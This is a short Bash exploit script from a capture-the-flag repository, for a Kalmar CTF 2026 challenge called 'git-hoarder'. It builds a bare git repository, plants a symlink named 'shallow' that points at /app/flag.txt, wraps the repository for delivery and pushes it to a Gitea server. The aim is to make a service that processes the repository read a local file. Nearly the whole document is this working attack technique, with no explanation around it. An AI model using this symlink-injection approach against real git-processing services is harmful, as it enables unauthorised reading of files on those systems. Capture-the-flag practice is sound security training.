Files
ctf/2026/kalmar/misc/git-hoarder/exploit.sh
2026-04-15 01:05:54 +02:00

32 lines
722 B
Bash

# 1. Create the base repository with a commit
mkdir base_repo && cd base_repo
git init
git commit --allow-empty -m "init"
cd ..
# 2. Create the bare clone (the payload)
git clone --bare base_repo malicious.git
# 3. Inject the symlink
cd malicious.git
ln -s /app/flag.txt shallow
# 4. Force Git to track the refs directories
mkdir -p refs/heads refs/tags
touch refs/.keep
touch refs/heads/.keep
touch refs/tags/.keep
cd ..
# 5. Wrap it for delivery
mkdir wrapper && cd wrapper
git init
cp -r ../malicious.git .
git add malicious.git
git commit -m "Delivery package with refs tracked"
# 6. Push to your server
git branch -M main
git remote add origin https://gitea.cato447.de/cato447/pwn.git
git push -u origin main -f